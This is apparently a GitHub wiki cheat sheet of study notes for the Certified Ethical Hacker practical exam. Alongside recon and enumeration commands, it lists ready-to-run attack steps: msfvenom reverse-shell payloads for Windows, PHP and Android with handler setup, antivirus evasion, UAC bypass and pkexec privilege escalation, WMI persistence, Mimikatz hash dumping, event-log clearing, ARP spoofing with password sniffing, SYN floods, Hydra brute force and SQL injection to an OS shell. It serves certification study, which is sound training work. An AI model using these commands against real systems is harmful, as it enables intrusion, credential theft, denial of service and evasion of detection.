Home - Dlopez86/CEH GitHub Wiki
https://book.thegurusec.com/certifications/certified-ethical-hacker-practical
Youtube Metadata https://mattw.io/youtube-metadata/
FTP Search https://www.searchftps.net/
IoT Search
https://www.shodan.io/
Site Report
https://sitereport.netcraft.com/
https://whois.domaintools.com/
billcipher
python3 billcipher.py
NSLOOKUP
nslookup
set type=a and press Enter. Setting the type to "a" configures nslookup to query for the IP address of a given domain.
To obtain the domain's authoritative name server
set type=cname
to determine the IP address of the name server
set type=a
REVERSE DNS [PTR]
dnsrecon.py -r 205.251.242.103-205.251.242.200
locate the network range
https://search.arin.net/rdap/?query=162.251.123.19
Find people
https://www.peekyou.com/
Sherlock (Find social media accounts)
Searchfy
gather personnel information
help
marketplace install all
modules search
workspaces create MW
db insert domains
show domains
modules load brute
recon/domains-hosts/brute_hosts
run
show hosts
back
modules load recon/domains-hosts/bing_domain_web
run
theHarvester:
This tool gathers emails, subdomains, hosts, employee names, open ports, and banners from different public sources such as search engines.
Grecon
Photon:
Photon is a Python script used to crawl a given target URL to obtain information such as URLs (in-scope and out-of-scope), URLs with parameters, email, social media accounts, files, secret keys and subdomains.
HTTrack
Web crawler and web cloner.
It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer.
WebData Extractor
Wordlist Generate (from website)
cewl -d 2 -m 5 https://www.hola.com
EMAIL TRACKING Email tracker pro
PING
Determine packet/frame size
ping www.google.es -f -l 1500
Determine TTL (max 255)
ping www.google.es -i 3
OSINT
Discovering hosts
nmap -sP [Target IP Range]
(Ping Sweep)
nmap -sn [Target IP Range]
nmap -sn -PR [Target IP Range] (Scanner with ARP)
nmap -sn -PU [Target IP Range] (Scanner UDP)
nmap -sn -PE [Target IP Range] (Scanner ICMP)
nmap -sn -PM [Target IP Range] (Scanner ICMP block)
nmap -sn -PS [Target IP Range] (Scanner SYN)
nmap -sn -PA [Target IP Range] (Scanner ACK)
nmap -sn -PO [Target IP Range] (Scanner IP protocol)
nmap -A -T4 [Target IP Range] (Aggressive)
nmap -sC -sV -p- -A -v -T4 [Target IP Range]
(Scripts Versions Ports and OS-SCAN)
sx arp [Target IP Range]
sx tcp -p 1-65535 [Target IP Range]
hping3 -8 0-100 -S [Target IP Address] -V
Advanced IP Scanner
MEGAPING (Windows)
OS Discovery
FQDN
nmap --script smb-os-discovery.nse [Target IP Range]
nmap -O -T4 [Target IP Range]
"auxiliary/scanner/smb/smb_version"
service postgresql start
msfconsole
search [Module]
use auxiliary/scanner/smb/smb_version
set RHOSTS [IP Range]
run
Generate Packets
hping3 [Target IP Address] --udp --rand-source --data 500
hping3 [Target IP Address] --flood
Colasoft Packet Builder
NetBIOS Enumeration
Windows
nbtstat -a [IP address of the remote machine] (Shows the netbios info of the remote machine)
net use (shows the mounted NetBIOS network shares)
Linux
nmap -sU -p 137 --script nbstat.nse [Target IP Address]
SNMP Enumeration
nmap -sU -p 161 [Target IP address]
(Check port 161)
snmp-check [Target IP Address]
(Get SNMP information with the public community string) (CAN GET USER ACCOUNTS)
snmpwalk -v1 -c public [target IP]
snmpwalk -v2c -c public [Target IP Address]
nmap -sU -p 161 --script=snmp-sysdescr [target IP Address]
nmap -sU -p 161 --script=snmp-processes [target IP Address]
nmap -sU -p 161 --script=snmp-win32-software [target IP Address]
nmap -sU -p 161 --script=snmp-interfaces [target IP Address]
Softperfect Network Scanner
LDAP Enumeration
ADexplorer
nmap -sU -p 389 [Target IP address]
nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=dominio,dc=com"'
[Target IP Address] (CAN GET USER ACCOUNTS)
ldapsearch -h [Target IP Address] -x -s base namingcontexts
ldapsearch -h [Target IP Address] -x -b "DC=DOMAIN,DC=com"
ldapsearch -x -h [Target IP Address] -b "DC=DOMAIN,DC=com" "objectclass=*"
ldapsearch -x -h 10.10.10.25 -b "dc=DOMAIN,dc=com" "objectclass=user" cn=user
Script Python (CAN GET USER ACCOUNTS)
python3
import ldap3
server=ldap3.Server('[Target IP Address]', get_info=ldap3.ALL,port=[Target Port])
connection=ldap3.Connection(server)
connection.bind()
server.info
(CAN GET DOMAIN NAME and LDAP version)
connection.search(search_base='DC=dominio,DC=com',search_filter='(&(objectclass=*))',search_scope='SUBTREE', attributes='*')
connection.entries
connection.search(search_base='DC=dominio,DC=com',search_filter='(&(objectclass=person))',search_scope='SUBTREE', attributes='userpassword')
connection.entries
NFS
nmap -p 2049 [Target IP Address]
echo "[Target IP]" >> Target.txt
superenum
python3 rpc-scan.py [Target IP address] --rpc
DNS
dig ns [Target Domain]
dig @[NameServer] [Target Domain] axfr
(Zone Transfer)
nslookup
set querytype=soa
Enter the domain name
ls -d [Name Server]
(Zone Transfer)
./dnsrecon.py -d [Target domain] -z
(CAN CHECK DNSSEC)
nmap -T4 -p 53 --script dns-brute [Target Domain]
rDNS
nmap --script=broadcast-dns-service-discovery [Target Domain]
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='[Target Domain]'"
SMTP
nmap -p 25 --script=smtp-enum-users [Target IP Address]
(CAN GET USER ACCOUNTS)
nmap -p 25 --script=smtp-open-relay [Target IP Address]
nmap -p 25 --script=smtp-commands [Target IP Address]
SMB
Get the SMB version enabled (CAN GET SHARED FOLDERS):
smbclient //[IP]/C$
Message signing feature
nmap -p 445 -A [TARGET IP]
HTTP SERVER
nmap -p80,443 --script http-headers [TARGET IP]
Windows and Samba systems
enum4linux -a -n [Target IP Address]
(CAN GET USER ACCOUNTS)
enum4linux -u USER -p PASSWORD -n [Target IP Address]
enum4linux -u USER -p PASSWORD -U [Target IP Address]
enum4linux -u USER -p PASSWORD -o [Target IP Address]
enum4linux -u USER -p PASSWORD -G [Target IP Address]
enum4linux -u USER -p PASSWORD -S [Target IP Address]
https://cve.mitre.org/index.html
https://nvd.nist.gov/vuln-metrics/cvss#
OpenVAS
Pentesting --> Vulnerability Analysis --> Openvas - Greenbone --> Start Greenbone Vulnerability Manager Service
NESSUS
NIKTO
Pentesting --> Web Application Analysis --> Web Vulnerability Scanners --> nikto
nikto -h (Target Website) -Tuning x
(Scan with all tuning options enabled)
nikto -h (Target Website) -Cgidirs all
(CHECK ALL CGI DIRECTORIES)
nikto -h (Target Website)
(SHOWS HOST HEADERS)
responder -I eth0
[CAPTURE SMB SHARED INFORMATION]
Password Cracking Windows
L0phtCrack
Armitage
service postgresql start
armitage
Ninja Jonin
list (shows all connected machines)
connect [n] (connect to a machine)
change (Change to a cmd)
MSFVENOM
https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[IP] LPORT=[XXXX] -f exe > Exploit.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP]
exploit -j -z
sessions -i 1
PRIVILEGE ESCALATION
https://www.hackingarticles.in/metasploit-for-pentester-migrate/
getsystem -t 1
use exploit/windows/local/bypassuac_fodhelper
use post/multi/recon/local_exploit_suggester
BeRoot.exe
pkexec CVE-2021-4034
make
(And execute)
PERSISTENCE
Wmi
upload Wmi-Persistence-master [Directory on the remote machine]
load powershell
powershell_shell
cd [Directory on the remote machine]
Import-Module ./WMI-Persistence.ps1
Install-Persistence -Trigger Startup -Payload "C:\Users\Administrator\Downloads\wmi.exe"
NFS MISCONFIGURATION
nmap -p2049 [IPRANGE]
(Detects the NFS service)
sudo apt-get install nfs-common
showmount -e [IP]
(Check if a resource is available to mount)
sudo mount -t nfs [IP]:/home /tmp/nfs
(Mounts the share)
cp /bin/bash /tmp/nfs
sudo chmod +s /tmp/nfs/bash
./bash -p
Dump hashes
post/windows/gather/smart_hashdump
MIMIKATZ
load kiwi
help kiwi
lsa_dump_sam
lsa_dump_secrets
password_change
password_change -u Admin -n [NTLM hash of Admin acquired in previous step] -P password
CRACKING HASHES
john --format=NT --wordlist=wordlist.txt hash_ntlm.txt
john --format=raw-md5 --wordlist=wordlist.txt hash.txt
https://hashes.com/en/decrypt/hash
Clearing tracks
clearev
(METASPLOIT)
Clear_Event_Viewer_Logs.bat
wevtutil el
(Display a list of event logs)
wevtutil cl [log_name]
(Clear log)
cipher /w:[Drive or Folder or File Location]
(overwrite deleted files)
export HISTSIZE=0
(Disable bash shell history)
history -c
(Clear history)
history -w
(Clear history of the current session)
Hiding files
NTFS Stream (Alternate Data Streams)
type c:\tmp\calc.exe > c:\tmp\readme.txt:calc.exe
mklink malicious.exe readme.txt:calc.exe
dir /r
(Detect hidden files)
attrib +h +s +r Test
attrib -s -h -r Test
Hiding accounts
net user Test /active:yes
net user Test /active:no
STEGANOGRAPHY
Hide a message in a text file
snow -C -m "this is the secret message you cannot read" -p "passoword" readme.txt readme2.txt
Show a hidden message in a text file
snow -C -p "passoword" readme2.txt
In images (OpenStego):
https://stegonline.georgeom.net/upload
COVERT CHANNEL
cc -o covert_tcp covert_tcp.c
LISTENER
./covert_tcp -dest [Own IP] -source [Sender IP] -source_port 9999 -dest_port 8888 -server -file /message.txt
SENDER
./covert_tcp -dest [Destination IP] -source [Own IP] -source_port 8888 -dest_port 9999 -file /message.txt
Enable, and Clear Audit Policies using Auditpol
auditpol /get /category:*
(GET ALL POLICIES)
auditpol /set /category:"system","account logon" /success:enable /failure:enable
(ENABLE AUDIT POLICIES)
auditpol /clear /y
(Clear audit policies)
Crypters
swayze cryptor
Malware Analysis
HYBRID ANALYSIS
https://www.hybrid-analysis.com
Strings Search
Bintext
Packing and obfuscation methods using PEiD
PEiD.exe
DIE.exe (Detect It Easy)
Entropy
PE Explorer
Dependency Walker
IDA Debugger
GHIDRA
C:\Program Files\jdk-17.0.2+8
TCPVIEW && CURPORTS
DNS Query Sniffer
PROCESS MONITOR
REG ORGANIZER
SERVICE MANAGER (SRVMAN)
WINPATROL && Autorun for the Windows
Mirekusoft Install Monitor tool to detect hidden and background installations
PA File Sight (Check integrity of file system)
DriverView
MAC Spoof
macof -i eth0 -n 100
arpspoof -i eth0 -t [IP1] [IP2]
(Informs (IP2) that the target system (IP1) has our MAC address)
Cain & Abel
DETECT ARP SPOOFING AND MONITOR MODE
Detect ARP with Wireshark expert information
Detect monitor with NMAP
nmap --script=sniffer-detect [Target IP Address]
MAC Changer
Smac tool
(Change MAC address - Windows)
macchanger -a
(Set random MAC address - Linux)
macchanger -m [MAC]
(Set a specific MAC address - Linux)
DHCP starvation
yersinia -I
"h" for HELP
"F2" to set DHCP mode
"x" to show available options
"1" To start attack
"q" to Stop attack
Wireshark
Filters:
https://insights.profitap.com/14-powerful-wireshark-filters-to-use
Expert information
Analyze -> Expert Information
Web cloner and phishing
setoolkit
Check a URL for phishing:
https://sitereport.netcraft.com/
SYN FLOOD
Metasploit:
auxiliary/dos/tcp/synflood
hping3
hping3 -S (Target IP Address) -a (Spoofable IP Address) -p (PORT) --flood
[TCP MODE]
hping3 -2 -p (PORT) --flood (Target IP Address)
[UDP MODE]
hping3 -d 65538 -S -p 22 --flood (Target IP Address)
Raven-storm
rst
l4
ip [Target]
port [port]
threads [N]
run
HOIC
LOIC
ANTI DDOS GUARDIAN
Zed Attack Proxy (ZAP)
On the target Machine
On the hacker Machine
HETY
ARP Spoofing
Bettercap
bettercap -iface eth0
help
net.probe on
(Detect hosts)
net.recon on
(Read ARP Requests)
set http.proxy.sslstrip true
(Enable SSLstrip)
set arp.spoof.internal true
(Enable spoofing)
set arp.spoof.targets [IP]
(Setting the IP Target to ARP Spoof)
http.proxy on
(Initiates http proxy)
arp.spoof on
(Initiates ARP spoofing)
net.sniff on
(Performing sniffing)
set net.sniff.regexp '.password=.+'
(Regular expression to sniff passwords)
NMAP Scans
nmap -sP [RANGE IP]
(Scans live machines)
nmap -sI [Zombie IP] [Target IP]
(Scan using zombie machine)
HTTP/FTP Tunneling
HTThost
On the "jump" machine:
On the "client" machine:
Bypass Antivirus using Metasploit Templates
pluma /usr/share/metasploit-framework/data/templates/src/pe/exe/template.c
Change SCSIZE
cd /usr/share/metasploit-framework/data/templates/src/pe/exe/
i686-w64-mingw32-gcc template.c -lws2_32 -o evasion.exe
msfvenom -p windows/shell_reverse_tcp lhost=[IP] lport=[PORT] -x /usr/share/metasploit-framework/data/templates/src/pe/exe/evasion.exe -f exe > /home/user/Desktop/stealth_shell.exe
Bypass Firewall through Windows BITSAdmin
Set up an HTTP server hosting the file to download.
Open PowerShell
bitsadmin /transfer Exploit.exe http://myserver.com/File.exe c:\File.exe
Gather information.
Ghost Eye (https://github.com/BullsEye0/ghost_eye)
Navigate to the directory of ghost_eye
pip3 install -r requirements.txt
python3 ghost_eye.py
[+] 1. EtherApe – Graphical Network Monitor (root)
[+] 2. DNS Lookup
[+] 3. Whois Lookup
[+] 4. Nmap Port Scan
[+] 5. HTTP Header Grabber
[+] 6. Clickjacking Test - X-Frame-Options Header
[+] 7. Robots.txt Scanner
[+] 8. Cloudflare Cookie scraper
[+] 9. Link Grabber
[+] 10. IP Location Finder
[+] 11. Detecting CMS with Identified Technologies
[+] 12. Traceroute
[+] 13. Crawler target url + Robots.txt
[+] 14. Certificate Transparency log monitor
UNISCAN Tool
uniscan -u [URL] -d (Can get email accounts)
HTTPRecon
ID Server
Netcat and Telnet
nc -vv [URL] 80
GET / HTTP/1.0
(shows ETag)
telnet [URL] 80
GET / HTTP/1.0
Enumerate Web Server Information using Nmap Scripting
nmap -sV --script=http-enum [target website]
nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap- [target website]
nmap --script http-trace -d [target website]
nmap -p80 --script http-waf-detect [target website]
Brute force with Hydra
https://github.com/gnebbia/hydra_notes
The Hydra parameter "-d" can help when debugging; it prints the packet contents.
HTTP Basic Authentication
hydra -L users.txt -P words.txt www.site.com http-head /private/
HTTP Forms
hydra -L <users_file> -P <password_file> <url> http[s]-[post|get]-form \
"index.php:param1=value1&param2=value2&user=^USER^&pwd=^PASS^&paramn=valn:[F|S]=message_shown"
hydra -l admin -P pass.txt https://url.com https-post-form "index.php:param1=value123&user=^USER^&pass=^PASS^:S=Success!!"
HTTP Get Login Forms
hydra -l admin -P /root/Desktop/wordlists/test.txt http://www.website.com \
http-get-form "/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."
HTTP Post Forms
hydra 192.168.1.69 http-post-form "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" \
-L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
SSH
hydra -l root -M /path/to/ip/list.txt -P /path/to/passwordlist.txt ssh -t 4
FTP
hydra -L Usernames.txt -P Passwords.txt ftp://[IP]
SMB
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
Grab web technologies
whatweb -v [Target Web Application]
ZAP (find potential vulnerabilities with the advanced scanner)
Check for load balancer
dig [URL]
(if it shows several IPs there is a load balancer)
lbd [url]
Identify Web Server Directories
nmap -sV --script=http-enum [target domain or IP address]
gobuster dir -u [Target Website] -w folders.txt
python3 dirsearch.py -u [Target Website]
Vulnerabilities scanner
Vega
N-Stalker Web Application Security Scanner
ClickJacking checker
echo "http://URL" | tee domain.txt
python3 clickJackPoc.py -f domain.txt
Identify XSS Vulnerabilities
python3 pwnxss.py -u [URL]
brute-force attack
using Burp Suite
https://portswigger.net/support/using-burp-to-brute-force-a-login-page
Enumerate WP users and plugins
wpscan --api-token [API] --url [URL] --enumerate u
wpscan --api-token [API] --url [URL] --plugins-detection aggressive --enumerate vp
Metasploit:
use auxiliary/scanner/http/wordpress_login_enum
set PASS_FILE password.txt
set RHOSTS [IP Address]
set RPORT [PORT]
set TARGETURI [URL]
set USERNAME [User]
run
DVWA
| net user Test /Add
| net localgroup Administrators Test /Add
Send PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine] LPORT=4444 -f raw
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST [IP]
set LPORT [PORT]
run
Log4j Vulnerability
tar -xf jdk-8u202-linux-x64.tar.gz
mv jdk1.8.0_202 /usr/bin/
pluma poc.py
replace jdk1.8.0_20/bin/javac with /usr/bin/jdk1.8.0_202/bin/javac
replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java
nc -lvp 9001
python3 poc.py --userip [YOURIP] --webport [WEBPORT] --lport [YOURPORT]
Copy the generated link and paste it on the login page.
Detect SQL Injection Vulnerabilities
Manually
aaa' or 1=1 --
aaa';insert into login values ('fakeAdmin','123456'); --
DSSS
document.cookie
python3 dsss.py -u "http://vulnwebsite/sectionA.php?id=1" --cookie="[cookie]"
ZAP
SQLMAP
sqlmap -u "http://vulnwebsite/sectionA.php?id=1" --cookie="[cookie]" --dbs
(Extracts databases)
sqlmap -u "http://vulnwebsite/sectionA.php?id=1" --cookie="[cookie]" -D Database --tables
(Extracts tables)
sqlmap -u "http://vulnwebsite/sectionA.php?id=1" --cookie="[cookie]" -D Database -T Table --dump
(Dump all data)
sqlmap -u "http://vulnwebsite/sectionA.php?id=1" --cookie="[cookie]" -D Database -T Table --os-shell
(Get a Shell)
POST
sqlmap -u http://thehost/include/login.php --data "password=letmein&username=this_is_a_real_username" -p "username" --dbms=mysql
Crack WEP Keys
aircrack-ng fileWEP.cap
Crack WPA Keys
aircrack-ng -a2 -b [Target BSSID] -w password.txt fileWPA2.cap
Create reverse shell APK
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=[IP] LPORT=[PORT] R > Desktop/Backdoor.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [IP]
set LPORT [PORT]
exploit -j -z
sessions 1
sysinfo
PhoneSploit
adbport 5555
python3 -m pip install colorama
python3 phonesploit.py
3 (Connect new phone)
4 (Get a shell)
9 (download files or directories)
AndroRAT
python3 androRAT.py --build -i [YOURIP] -p 4444 -o FakeApp.apk
python3 androRAT.py --shell -i 0.0.0.0 -p 4444
help
deviceInfo
getMACAddress
getSMS inbox
Malware Analysis
Malwarebytes Security mobile application
Shodan
MQ Telemetry publish message.
MQTT
S3 Bucket Enumeration
ruby lazys3.rb [Company]
finds the open S3 buckets:
python3 ./s3scanner.py sites.txt
python3 ./s3scanner.py --include-closed --out-file found.txt --dump names.txt
python ./s3scanner.py --list names.txt
Hash MD5 CRC SHA1
Hash calc
MD5 calculator
Hash My Files
CRYPT
Cryptoforge
.cfg
BtcTextEncoder
Cryptanalysis
CrypTool
AlphaPeeler